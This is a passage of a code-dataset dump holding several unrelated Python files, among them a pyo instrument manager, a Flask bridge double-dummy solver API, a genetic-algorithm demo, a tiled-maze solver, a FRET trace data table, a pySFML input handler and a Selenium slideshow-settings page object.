'testManager' == m.nodeName\n True\n >>> del m\n \"\"\"\n OscNode.__init__(self, str(name))\n\n\n def __del__(self):\n \"\"\"InstruentManager destructor\"\"\"\n logging.info(\"Removing instrument manager '%s' and all its content\" % (self.nodeName))\n while len(self.children) > 0:\n self.removeInstrument(self.children.items()[0][0])\n\n\n def __getitem__(self, name):\n \"\"\"Operator [] to access managed instruments\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> m.addInstrument('instrumentTest', pyo.Sig(0))\n >>> m['instrumentTest'].nodeName == m.children['instrumentTest'].nodeName\n True\n >>> del m\n \"\"\"\n return self.children[name]\n\n\n def view(self):\n \"\"\"Show each registered instrument\"\"\"\n for instrument in self.children:\n self.children[instrument].view()\n\n\n def setStandardInstruments(self):\n \"\"\"Initialize the manager with an Instrument for each input channel\"\"\"\n for i in range(1, len(audioInputs)):\n self.addInstrument(str(i), audioInputs[i])\n\n\n def addInstrument(self, name, input):\n \"\"\"\n Add a new instrument against its name, replacing existing one\n\n Params:\n name : str\n Instrument name to be added to the manager\n\n input : pyo.PyoObject\n Input signal to link to the new Intsrument\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> m.addInstrument('instrumentTest', pyo.Sig(0))\n >>> m.children['instrumentTest'].nodeName == 'instrumentTest'\n True\n >>> del m\n \"\"\"\n self.addChild(Instrument(name, input))\n\n\n def removeInstrument(self, instrumentName):\n \"\"\"\n Remove an Instrument by its nodeName\n\n Params:\n instrumentName : str\n Instrument nodeName that identify the removable Instrument\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> m.addInstrument('instrumentTest', pyo.Sig(0))\n >>> m.removeInstrument('instrumentTest')\n >>> 'instrumentTest' in m.children\n False\n >>> del m\n \"\"\"\n self.removeChild(instrumentName)\n\n\n def out(self):\n \"\"\"Activate all Instruments outputs\"\"\"\n logging.debug(\"Connect each Instruments to its numbered output\")\n for child in self.children:\n self.children[child].out(chnl=int(child) - 1)\n\n\nif __name__ == \"__main__\":\n import doctest\n fails,total = doctest.testmod(verbose=True)\n if total > 0 and fails == 0:\n manager = InstrumentManager(\"iMgr\")\n manager.setStandardInstruments()\n i = manager.children[\"1\"]\n patLive = pyo.Pattern(i.liveBuffer.refreshView, 0.05).play()\n patFixed = pyo.Pattern(i.fixedBuffer.refreshView, 0.05).play()\n i.liveBuffer.view()\n i.fixedBuffer.view()\n audioServer.start()\n audioServer.gui(locals())\n","sub_path":"instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":9788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"441525852","text":"from flask import Flask, request\nfrom flask_cors import CORS\nfrom flask_restful import Resource, Api\n\nfrom .dds import DDS\n\nimport yaml\n\n# Configuration filename\nconfig_filename = \"server.yaml\"\n\n# Default for maximum threads is to let the library decide\nmt = 0\n# Default for maximum memory is to let the library decide\nmm = 0\n\napp = Flask(__name__)\n\nconfig = {}\ntry:\n with open(config_filename) as config_handle:\n config = yaml.safe_load(config_handle)\n libdds_config = config.get('libdds', {})\n mm = libdds_config.get('max_memory', mm)\n mt = libdds_config.get('max_threads', mt)\nexcept (yaml.YAMLError, AttributeError) as err:\n app.logger.critical(f\"Unable to parse configuration {config_filename}: \"\n f\"{err}\")\n raise\nexcept Exception as err:\n app.logger.warning(f\"Unable to load configuration {config_filename}: \"\n f\"{err}\")\n app.logger.warning(\"Using the default configuration.\")\n\napp.config.from_mapping(config.get('flask', {}))\nCORS(app)\napi = Api(app)\n\n# When SetMaxThreads is called there must not be any other threads calling\n# libdds. The easiest way to avoid parallel calls is to keep only one DDS\n# object as long as server runs.\ndds = DDS(max_threads=mt, max_memory=mm)\n\n\nclass DDSTable(Resource):\n def get(self):\n return {'hello': 'world'}\n\n def post(self):\n \"\"\"Takes in a single hand and returns a DDS table\"\"\"\n data = request.get_json()\n # Verify the data here\n # self.verifyinput(data)\n dds_table = dds.calc_dd_table(data['hands'])\n return dds_table\n\n\nclass DDSScore(Resource):\n def post(self):\n \"\"\"This should hook in to the dds_scores function listed below\"\"\"\n raise NotImplementedError()\n\n def dds_scores(self, dds, state, target, solutions, mode=1):\n \"\"\"Gives the dds score for the given contract, may be mid-hand\"\"\"\n n = len(state['plays']) % 4\n first = state['plays'][-n][0] if n > 0 else state['turn']\n trick = [c for _, c in state['plays'][-n:]] if n > 0 else []\n return dds.solve_board(state['trump'], first, trick, state['hands'],\n target, solutions, mode)\n\n\napi.add_resource(DDSTable, '/api/dds-table/')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n # Here is an example command to use with curl\n # curl --header \"Content-Type: application/json\" --request POST --data '{\"hands\":{\"S\":[\"D3\", \"C6\", \"DT\", \"D8\", \"DJ\", \"D6\", \"CA\", \"C3\", \"S2\", \"C2\", \"C4\", \"S9\", \"S7\"],\"W\":[\"DA\", \"S4\", \"HT\", \"C5\", \"D4\", \"D7\", \"S6\", \"S3\", \"DK\", \"CT\", \"D2\", \"SK\",\"H8\"],\"N\":[\"C7\", \"H6\", \"H7\", \"H9\", \"CJ\", \"SA\", \"S8\", \"SQ\", \"D5\", \"S5\", \"HK\", \"C8\", \"HA\"],\"E\":[\"H2\", \"H5\", \"CQ\", \"D9\", \"H4\", \"ST\", \"HQ\", \"SJ\", \"HJ\", \"DQ\", \"H3\", \"C9\", \"CK\"]}}' http://localhost:5000/api/dds-table/\n\n # Example input format\n # state = {\n # 'plays': [['W', 'H8']],\n # 'hands': {\n # 'S': ['D3', 'C6', 'DT', 'D8', 'DJ', 'D6', 'CA', 'C3', 'S2', 'C2', 'C4', 'S9', 'S7'],\n # 'W': ['DA', 'S4', 'HT', 'C5', 'D4', 'D7', 'S6', 'S3', 'DK', 'CT', 'D2', 'SK'],\n # 'N': ['C7', 'H6', 'H7', 'H9', 'CJ', 'SA', 'S8', 'SQ', 'D5', 'S5', 'HK', 'C8', 'HA'],\n # 'E': ['H2', 'H5', 'CQ', 'D9', 'H4', 'ST', 'HQ', 'SJ', 'HJ', 'DQ', 'H3', 'C9', 'CK']\n # },\n # 'trump': 'N'\n # }\n # Solve for a specific position inside the play\n # print(dds_scores(dds, state, target=-1, solutions=3))\n\n # Generate the table at the end of the board\n # state['hands']['W'].append('H8')\n # print(dds.calc_dd_table(state['hands']))\n\n","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"17671070","text":"# зададим всевозможные символы, которые будут использоваться при генерации сообщений\nlettersSet = \" abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!.\"\ntarget = \"intelligent information systems.\"\n\nimport random\n\n# генерация начальной популяции\ndef generateParent(length: int) -> str:\n genesList = list()\n while len(genesList) < length:\n sampleSize = min(length - len(genesList), len(lettersSet))\n genesList.extend(random.sample(lettersSet, sampleSize))\n return \"\".join(genesList)\n\n\n# подсчёт фитнес функции5\ndef fitness(guess) -> int:\n return sum(1 for expected, actual in zip(target, guess) if expected == actual)\n\n\n# мутация новых особей\ndef mutate(parent):\n index = random.randrange(0, len(parent))\n childGenes = list(parent)\n newGene, alternate = random.sample(lettersSet, 2)\n if newGene == childGenes[index]:\n childGenes[index] = alternate\n else:\n childGenes[index] = newGene\n return \"\".join(childGenes)\n\n\nimport datetime\n\n# вывод результатов\ndef display(guess):\n timeDiff = datetime.datetime.now() - startTime\n res = fitness(guess)\n print(\"{0}\\t{1}\\t{2}\".format(guess, res, str(timeDiff)))\n\n\nrandom.seed()\nstartTime = datetime.datetime.now()\nbestParent = generateParent(len(target))\nbestFitness = fitness(bestParent)\ndisplay(bestParent)\n\n# итерируемся до тех, пор пока не отыщем верное решение\n\nwhile True:\n child = mutate(bestParent)\n childFitness = fitness(child)\n\n if childFitness <= bestFitness:\n continue\n display(child)\n if len(bestParent) <= childFitness:\n break\n bestFitness = childFitness\n bestParent = child\n","sub_path":"Tasks/lab1_3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"147565767","text":"# ---------------------------------------\n# tiled maze solution finder\n# ---------------------------------------\n# add tiles to \"allTilesEdges\"\n# each tile comprises 16 possible exits, 1 = exit, 0 = wall\n# list each tile's exits working clockwise from a starting point\n# \"allTiles\" tuples list each tile in each of it's 4 possible rotations\n# where tuple = (tileIndex in allTileEdges, rotation clockwise * 90 degress)\n# visual of the 'best' solution:\n# 0 0 0 1 0 1 1 0 0 0 0 0 0 0 0 1\n# 0 1 1 1 1\n# 0 0 0 0 0\n# 0 0 0 1 0\n# 0 1 1 1 0\n# 1 0 0 1 0 0 0 0 0 1 1 0 0 0 0 1\n# 1 0 0 1 0\n# 1 0 0 0 0\n# 0 0 0 1 0\n# 1 1 1 1 1\n# 1 0 0 1 0 0 1 0 0 1 1 0 0 0 0 0\n# 1 1 0 0 0\n# 0 1 1 1 0\n# 0 0 1 0 1\n# 1 1 0 0 0\n# 0 1 1 0 0 1 1 0 0 0 0 1 0 1 0 0\n# 1 0 1 0 0\n# 1 1 0 0 0\n# 0 0 1 1 0\n# 1 0 1 0 0\n# 1 0 1 1 1 0 0 1 0 0 0 1 1 0 0 1\n\n\n\nallTiles = [(0,0),(0,1),(0,2),(0,3),(1,0),(1,1),(1,2),(1,3),(2,0),(2,1),(2,2),(2,3),(3,0),(3,1),(3,2),(3,3),(4,0),(4,1),(4,2),(4,3),(5,0),(5,1),(5,2),(5,3),(6,0),(6,1),(6,2),(6,3),(7,0),(7,1),(7,2),(7,3),(8,0),(8,1),(8,2),(8,3),(9,0),(9,1),(9,2),(9,3),(10,0),(10,1),(10,2),(10,3),(11,0),(11,1),(11,2),(11,3),(12,0),(12,1),(12,2),(12,3),(13,0),(13,1),(13,2),(13,3),(14,0),(14,1),(14,2),(14,3),(15,0),(15,1),(15,2),(15,3)]\n\nallTilesEdges = [[0,1,1,0,1,0,1,1,0,1,1,0,1,0,0,0],\n [0,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1],\n [0,1,1,0,0,1,0,0,1,0,0,0,0,1,1,0],\n [0,1,1,0,1,0,0,1,0,0,0,0,1,0,0,1],\n [0,0,0,1,1,0,0,1,1,0,1,1,1,0,0,1],\n [1,1,0,1,0,0,0,1,0,0,0,1,0,0,0,0],\n [1,0,0,0,1,1,0,1,0,0,0,1,1,0,0,0],\n [1,0,0,0,1,1,0,1,0,0,0,1,0,0,1,0],\n [0,0,0,0,0,0,0,1,0,1,0,0,1,0,0,0],\n [0,1,0,0,1,1,0,1,1,0,1,1,0,1,1,0],\n [1,0,0,1,1,0,0,1,1,1,0,1,0,1,1,0],\n [0,1,0,0,0,0,0,0,1,0,0,1,0,1,0,0],\n [1,0,0,1,0,0,1,0,0,1,1,0,1,0,1,1],\n [0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0],\n [1,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1],\n [1,0,0,1,0,0,0,0,1,0,1,1,0,1,1,0]]\n\n\n\n# ------------------------------------------\n# functions to help out with tile activities\n# ------------------------------------------\n\n# rotate a tile's paths string, by the rotation factor given \n\ndef rotateTile(tile):\n\n if tile[1] == 0:\n edges = allTilesEdges[tile[0]]\n elif tile[1] == 1:\n edges = allTilesEdges[tile[0]]\n edges = edges[12:16] + edges[0:12]\n elif tile[1] == 2:\n edges = allTilesEdges[tile[0]]\n edges = edges[8:16] + edges[0:8]\n elif tile[1] == 3: \n edges = allTilesEdges[tile[0]]\n edges = edges[4:16] + edges[0:4]\n return edges\n\n\n \n# return the exit paths along the requested side of a tile \n\ndef getEdgePaths(tile, side): \n\n if side == \"N\":\n paths = rotateTile(tile)[0:4]\n elif side == \"E\":\n paths = rotateTile(tile)[4:8]\n elif side == \"S\":\n paths = rotateTile(tile)[8:12]\n elif side == \"W\":\n paths = rotateTile(tile)[12:16]\n return paths \n\n\n\n# compare the specified side of tile1 to the adjoining\n# side of tile2 e.g. W of tile 1 implies E of tile2\n\ndef compareEdgePaths(tile1, side1, tile2):\n\n edge1 = getEdgePaths(tile1, side1)\n\n if side1 == \"N\":\n side2 = \"S\"\n elif side1 == \"E\":\n side2 = \"W\"\n elif side1 == \"S\":\n side2 = \"N\"\n elif side1 == \"W\":\n side2 = \"E\"\n\n edge2 = getEdgePaths(tile2, side2)\n\n # reverse exit paths to compensate for clockwise string\n edge2 = edge2[::-1]\n\n if edge1 == edge2:\n return True\n else:\n return False\n\n\n\n# returns true if the array does not contain duplicate tile ids\ndef uniqueTiles(arrayOfTiles):\n\n i = 0\n for tileA in arrayOfTiles:\n i += 1\n for tileB in arrayOfTiles[i:]:\n if tileA[0] == tileB[0]:\n return False\n\n return True\n\n\n# returns an array of possible arrangements of four tiles\ndef validSquares():\n\n feasibleSquare = []\n \n for tileTL in allTiles:\n for tileTR in allTiles:\n for tileBL in allTiles:\n for tileBR in allTiles:\n \n square = []\n\n if compareEdgePaths(tileTL, \"E\", tileTR):\n if compareEdgePaths(tileTL, \"S\", tileBL):\n if compareEdgePaths(tileTR, \"S\", tileBR):\n if compareEdgePaths(tileBL, \"E\", tileBR):\n square.append(tileTL)\n square.append(tileTR)\n square.append(tileBL)\n square.append(tileBR)\n\n if uniqueTiles(square):\n feasibleSquare.append(square)\n return feasibleSquare\n\n\n# ------------------------------\n# main runtime to find solutions\n# ------------------------------\n\nprint(\"Generating valid 2x2 squares from tiles...\")\n\nresult = validSquares()\n\nprint(\"There are\", len(result), \"valid 2x2 squares.\") \nprint(\"Generating valid 2x2 squares with starting tile in correct position...\")\n\nstart = []\nfor chain in result:\n if chain[3] == (8, 0):\n start.append(chain) \n\nprint(\"There are\", len(start), \"valid 2x2 squares containing the starting tile in the correct position.\")\nprint(\"Generating feasible top 2x4 rows...\")\n\nfeasibleTopRow = []\nfor chainTL in start:\n for chainTR in result:\n topRow = []\n\n if compareEdgePaths(chainTL[1], \"E\", chainTR[0]):\n if compareEdgePaths(chainTL[3], \"E\", chainTR[2]):\n topRow.append(chainTL[0])\n topRow.append(chainTL[1])\n topRow.append(chainTL[2])\n topRow.append(chainTL[3])\n topRow.append(chainTR[0])\n topRow.append(chainTR[1])\n topRow.append(chainTR[2])\n topRow.append(chainTR[3])\n\n if uniqueTiles(topRow):\n feasibleTopRow.append(topRow)\n\nprint(\"There are\", len(feasibleTopRow), \"valid 2x4 top rows.\")\n\nanotherResult = []\nfor chain in result:\n anotherResult.append(chain)\n\nprint(\"Generating feasible bottom 2x4 rows...\")\n\nfeasibleBottomRow = []\nfor chainBL in result:\n for chainBR in anotherResult:\n bottomRow = []\n\n if compareEdgePaths(chainBL[1], \"E\", chainBR[0]):\n if compareEdgePaths(chainBL[3], \"E\", chainBR[2]):\n bottomRow.append(chainBL[0])\n bottomRow.append(chainBL[1])\n bottomRow.append(chainBL[2])\n bottomRow.append(chainBL[3])\n bottomRow.append(chainBR[0])\n bottomRow.append(chainBR[1])\n bottomRow.append(chainBR[2])\n bottomRow.append(chainBR[3])\n\n if uniqueTiles(bottomRow):\n feasibleBottomRow.append(bottomRow)\n\nprint(\"There are\", len(feasibleBottomRow), \"valid 2x4 bottom rows.\")\nprint(\"Generating feasible 4x4 grids\")\n\ncandidateSolutions = []\nfor topRow in feasibleTopRow:\n for bottomRow in feasibleBottomRow:\n candidate = []\n \n if compareEdgePaths(topRow[2], \"S\", bottomRow[0]):\n if compareEdgePaths(topRow[3], \"S\", bottomRow[1]):\n if compareEdgePaths(topRow[6], \"S\", bottomRow[4]):\n if compareEdgePaths(topRow[7], \"S\", bottomRow[5]):\n\n candidate.append(topRow[0])\n candidate.append(topRow[1])\n candidate.append(topRow[4])\n candidate.append(topRow[5])\n candidate.append(topRow[2])\n candidate.append(topRow[3])\n candidate.append(topRow[6])\n candidate.append(topRow[7])\n candidate.append(bottomRow[0])\n candidate.append(bottomRow[1])\n candidate.append(bottomRow[4])\n candidate.append(bottomRow[5])\n candidate.append(bottomRow[2])\n candidate.append(bottomRow[3])\n candidate.append(bottomRow[6])\n candidate.append(bottomRow[7])\n\n if uniqueTiles(candidate):\n candidateSolutions.append(candidate)\n\nprint()\nprint(\"The\", len(candidateSolutions), \"valid 4x4 grids are:\")\nfor line in range(len(candidateSolutions)):\n print(candidateSolutions[line])\n \n","sub_path":"mosaic-maze-solver.py","file_name":"mosaic-maze-solver.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"646220009","text":"import numpy as np\nimport base64\nimport pandas as pd\nfrom time import sleep\nfrom multiprocessing import Process\nfrom FRETboard.SafeH5 import SafeH5\nfrom FRETboard.SafeHDFStore import SafeHDFStore\nfrom FRETboard.FileParser import FileParser\nfrom FRETboard.helper_functions import numeric_timestamp, colnames_w_labels, colnames_alex_w_labels, df_empty\nfrom datetime import datetime\n\n\nclass MainTable(object):\n\n def __init__(self, framerate, eps, l, d, gamma, alex, h5_dir, main_process):\n self.main_process = main_process\n self.index_table = None # contains names and meta data of traces in hdf store\n self.manual_table = None # contains info as entered by user: is_labeled, is_junk\n self.traces_store_fn = h5_dir / 'traces_store.h5'\n self.predict_store_fn = h5_dir / 'predict_store_fn.h5'\n self.toparse_fn = h5_dir / 'to_parse.h5'\n self.label_dict = dict()\n self._eps, self._l, self._d, self._gamma, self._alex, self._traceswitch = eps, l, d, gamma, alex, 0\n self.framerate = framerate\n # _ = self.init_table(framerate, alex)\n # self.file_parser_process = self.init_table(framerate, alex)\n\n @property\n def framerate(self):\n return self._framerate\n\n @property\n def eps(self):\n return self._eps\n\n @property\n def l(self):\n return self._l\n\n @property\n def d(self):\n return self._d\n\n @property\n def gamma(self):\n return self._gamma\n\n @property\n def alex(self):\n return self._alex\n\n @property\n def traceswitch(self):\n return self._traceswitch\n\n @framerate.setter\n def framerate(self, framerate):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['framerate'] = framerate\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._framerate = framerate\n\n @alex.setter\n def alex(self, alex):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['alex'] = alex\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._alex = alex\n\n @traceswitch.setter\n def traceswitch(self, traceswitch):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['traceswitch'] = traceswitch\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._traceswitch = traceswitch\n\n @eps.setter\n def eps(self, eps):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['eps'] = eps\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._eps = eps\n\n @l.setter\n def l(self, l):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['l'] = l\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._l = l\n\n @d.setter\n def d(self, d):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['d'] = d\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._d = d\n\n @gamma.setter\n def gamma(self, gamma):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['gamma'] = gamma\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._gamma = gamma\n\n def init_table(self):\n # Create index table\n self.index_table = pd.DataFrame(\n columns=[\n 'trace', 'eps', 'l', 'd', 'gamma', 'data_timestamp','logprob', 'mod_timestamp'\n ]).set_index('trace')\n self.manual_table = df_empty(columns=['trace', 'is_labeled', 'is_junk'], dtypes=[str, bool, bool]).set_index('trace')\n with SafeHDFStore(self.traces_store_fn, 'a') as fh:\n fh.put('index_table', value=self.index_table, format='table', append=True)\n\n # make traces group\n with SafeH5(self.traces_store_fn, 'a') as fh:\n fh.create_group('traces')\n fh.create_group('raw')\n\n # hdf5 file for transfer to file parser\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'w') as fh:\n (fh.attrs['data_timestamp'],\n fh.attrs['framerate'], fh.attrs['eps'],\n fh.attrs['l'], fh.attrs['d'],\n fh.attrs['gamma'], fh.attrs['alex'],\n fh.attrs['traceswitch']) = (self.data_timestamp, self.framerate, self.eps, self.l, self.d,\n self.gamma, self.alex, self.traceswitch)\n\n # hdf5 file for transfer to predictor\n with SafeH5(self.predict_store_fn, 'w') as fh:\n pass\n fp_process = Process(target=FileParser, args=(self.toparse_fn, self.traces_store_fn, self.main_process),\n name='file_parser')\n fp_process.start()\n return fp_process\n\n def get_raw(self, raw_fn):\n with SafeH5(self.traces_store_fn, 'r') as fh:\n raw_out = fh['raw/' + raw_fn][()]\n return raw_out\n\n def get_trace(self, idx, await_labels=False):\n with SafeH5(self.traces_store_fn, 'r') as fh:\n tup = fh['/traces/'+idx][()]\n dummy = np.array([]) if await_labels else np.zeros(tup.shape[1])\n while True:\n with SafeH5(self.predict_store_fn, 'r') as fh:\n pred = fh.get('/' + idx, dummy)[()]\n if len(pred):\n break # todo somehow signal that this example has to be classified fast\n # sleep(0.1)\n # if not self.manual_table.loc[idx, 'is_labeled']:\n # self.label_dict[idx] = pred\n return pd.DataFrame(data=np.vstack((tup, pred)).T, columns=colnames_alex_w_labels)\n\n def get_trace_dict(self, labeled_only=False):\n out_dict = {}\n idx_list = list(self.label_dict) if labeled_only else self.index_table.index\n for idx in idx_list:\n out_dict[str(idx)] = self.get_trace(idx)\n return out_dict\n\n def add_tuple(self, content, fn):\n _, b64_contents = content.split(\",\", 1) # remove the prefix that JS adds\n file_contents = base64.b64decode(b64_contents)\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh[fn] = np.void(file_contents)\n\n def update_index(self):\n with SafeHDFStore(self.traces_store_fn, 'r') as fh:\n if 'index_table' in fh: self.index_table = fh.get('index_table')\n new_indices = [idx for idx in self.index_table.index if idx not in self.manual_table.index]\n if len(new_indices):\n new_df = pd.DataFrame({'trace': new_indices, 'is_labeled': False, 'is_junk': False}).set_index('trace')\n self.manual_table = pd.concat((self.manual_table, new_df))\n # invalidate accuracy cached property\n # self._invalidate_property('accuracy')\n\n # def push_index(self, idx, col, new):\n # with SafeHDFStore(self.traces_store_fn, 'a') as fh:\n # fh.loc[idx, col] = new\n # self.index_table.loc[idx, col] = new\n\n @property\n def accuracy(self):\n \"\"\"\n Return array of per-trace accuracy values and mean accuracy over entire dataset\n :return:\n \"\"\"\n if not len(self.label_dict):\n return np.array([np.nan], dtype=float), np.nan\n with SafeH5(self.predict_store_fn, 'r') as fh:\n pred_dict = {idx: fh.get('/' + idx, None)[()] for idx in self.label_dict}\n nb_correct = np.array([np.sum(self.label_dict[idx] == pred_dict[idx])\n for idx in self.label_dict if pred_dict[idx] is not None])\n nb_points = np.array([len(self.label_dict[idx]) for idx in self.label_dict if pred_dict[idx] is not None])\n return nb_correct / nb_points * 100, nb_correct.sum() / nb_points.sum() * 100\n\n # def _invalidate_property(self, prop):\n # if prop in self.__dict__:\n # del self.__dict__[prop]\n","sub_path":"FRETboard/MainTable_parallel.py","file_name":"MainTable_parallel.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632718144","text":"import autoarray as aa\nimport toy_gaussian.src.plot as aplt\nimport toy_gaussian as toy\nimport pytest\nimport os\nfrom os import path\n\ndirectory = path.dirname(path.realpath(__file__))\n\n\n@pytest.fixture(name=\"profile_plotter_path\")\ndef make_profile_plotter_setup():\n return \"{}/../../../test_files/plotting/profiles/\".format(\n os.path.dirname(os.path.realpath(__file__))\n )\n\n\n@pytest.fixture(autouse=True)\ndef set_config_path():\n aa.conf.instance = aa.conf.Config(\n path.join(directory, \"../test_files/plot\"), path.join(directory, \"output\")\n )\n\n\ndef test__all_quantities_are_output(\n gaussian_0,\n sub_grid_7x7,\n positions_7x7,\n include_all,\n profile_plotter_path,\n plot_patch,\n):\n\n toy.plot.profile_image(\n gaussian=gaussian_0,\n grid=sub_grid_7x7,\n positions=positions_7x7,\n include=include_all,\n plotter=aplt.Plotter(output=aplt.Output(profile_plotter_path, format=\"png\")),\n )\n\n assert profile_plotter_path + \"profile_image.png\" in plot_patch.paths\n","sub_path":"toy_gaussian/test/unit/test_plot/test_gaussian_plots.py","file_name":"test_gaussian_plots.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"233805027","text":"from sfml import Mouse, CloseEvent, KeyEvent, MouseEvent, MouseWheelEvent, MouseButtonEvent, MouseMoveEvent, ResizeEvent, Keyboard\n\n\n \n \n \n\nclass KeyboardEvent:\n \"\"\"This class represents all the events that might be fired once a key is\n pressed. It also contains information about whether the event has already\n been consumed or not. It's up to the classes that might use events to decide\n if the input is consumed or not.\"\"\"\n\n def __init__(self, sfmlEvent):\n self.code = sfmlEvent.code\n self.alt = sfmlEvent.alt\n self.control = sfmlEvent.control\n self.shift = sfmlEvent.shift\n self.system = sfmlEvent.system \n self.consumed = False\n\nclass MouseEvent:\n def __init__(self, position):\n self.consumed = False\n self.position = position\n\n \nclass Input:\n @staticmethod\n def init(view):\n \"\"\"Given the root of the keyconfig ElementTree, parses it and configures\n all the keys.\"\"\"\n \n # Store the human view to get and send events\n Input.view = view\n \n # Set initial mouse position\n Input.oldMousePosition = (0, 0)\n \n Input.listeners = []\n \n @staticmethod\n def addListener(listener):\n Input.listeners.append(listener)\n \n @staticmethod\n def removeListener(listener):\n Input.listeners.remove(listener)\n \n @staticmethod\n def isKeyPressed(key):\n return Keyboard.is_key_pressed(key)\n \n @staticmethod\n def processInput():\n \"\"\"Processes pySFML input and pushes events onto the input stack\"\"\"\n for sfmlEvent in Input.view._window.events:\n if sfmlEvent == KeyEvent:\n if(sfmlEvent.pressed and sfmlEvent.released):\n print(\"[ERROR] Keyboard pressed and released at the same time?!\")\n event = KeyboardEvent(sfmlEvent)\n if sfmlEvent.pressed:\n Input.view.onKeyDownEvent(event)\n else:\n Input.view.onKeyUpEvent(event)\n \n # MOUSE EVENTS\n elif sfmlEvent == MouseEvent:\n event = MouseEvent(Mouse.get_position())\n Input.view.onMouseEvent(event)\n elif sfmlEvent == MouseWheelEvent:\n event = MouseEvent(sfmlEvent.position)\n event.delta = sfmlEvent.delta\n Input.view.onMouseWheelEvent(event)\n elif sfmlEvent == MouseButtonEvent:\n event = MouseEvent(sfmlEvent.position)\n if(sfmlEvent.pressed and sfmlEvent.released):\n print(\"[ERROR] Mouse pressed and released at the same time?!\")\n event.button = sfmlEvent.button\n if sfmlEvent.pressed:\n Input.view.onMouseDownEvent(event)\n else:\n Input.view.onMouseUpEvent(event)\n elif sfmlEvent == MouseMoveEvent:\n event = MouseEvent(sfmlEvent.position)\n event.oldPosition = Input.oldMousePosition\n Input.view.onMouseMoveEvent(event)\n Input.oldMousePosition = sfmlEvent.position\n elif sfmlEvent == CloseEvent:\n Input.view._gm._currentState.done = True\n for listener in Input.listeners:\n try:\n listener.onWindowCloseEvent(sfmlEvent)\n except AttributeError as err:\n if not (\"onWindowCloseEvent\" in err.args[0]):\n raise AttributeError(err)\n elif sfmlEvent == ResizeEvent:\n Input.view.resetCamera()\n for listener in Input.listeners:\n try:\n listener.onWindowResizeEvent(sfmlEvent)\n except AttributeError as err:\n if not (\"onWindowResizeEvent\" in err.args[0]):\n raise AttributeError(err)\n # Consumed!\n return False\n\n ","sub_path":"7drl/nEngine/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"325373528","text":"from core.base_page import BasePage\nfrom selenium.common.exceptions import NoSuchElementException\nimport logging, sys, time, os\n# logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n\nclass SlideshowSettings(BasePage):\n def __init__(self, driver):\n \"\"\"\n :type browser: selenium.webdriver.*\n \"\"\"\n self.driver = driver\n self.logger = logging.getLogger(self.__class__.__name__)\n self.timeout = 15\n\n def navigate_to_slideshow_settings(driver):\n driver.logger.info('Navigate to Settings > Slide Show Settings')\n if not 'i18n_button_currenttab_td_middle' in driver.get_attribute(\"//SPAN[text()='Settings']/..\", \"class\"):\n driver.click(\"//SPAN[text()='Settings']\")\n assert driver.is_present(\"//a[contains(text(),'Slide Show Settings')]\")\n driver.click(\"//a[contains(text(),'Slide Show Settings')]\")\n assert driver.is_present(\"//select[@id='pauseintervals']\")\n\n\n def verify_ss_in_ss_settings(driver, slideshow, slides):\n driver.logger.info('verify slideshow {} has slides {} in Slide Show Settings'.format(slideshow, slides))\n assert driver.is_element_present(\"//option[contains(.,'\" + slideshow + \"')]\")\n driver.click(\"//option[contains(.,'\" + slideshow + \"')]\")\n slide_text =[]\n options = driver.get_elements(\"//select[@id='slides']/option\")\n for option in options:\n slide_text.append((option.text).strip())\n for val in slides:\n assert val in slide_text\n\n def delete_existing_slideshows(driver):\n driver.logger.info('Delete existing slideshow in Slide Show Settings')\n if driver.is_element_present(\"//select[@id='slideshows']/option\"):\n for i in range(10):\n driver.click(\"//select[@id='slideshows']/option\")\n driver.click(\"//input[@name='delete']\")\n assert 'Are you sure you want to delete slide show' in driver.close_alert_and_get_its_text()\n if not driver.is_element_present(\"//select[@id='slideshows']/option\"):\n break\n\n def create_slideshow_from_settings(driver, slideshow, pauseinterval=\"\"):\n driver.logger.info('create slideshow {} via 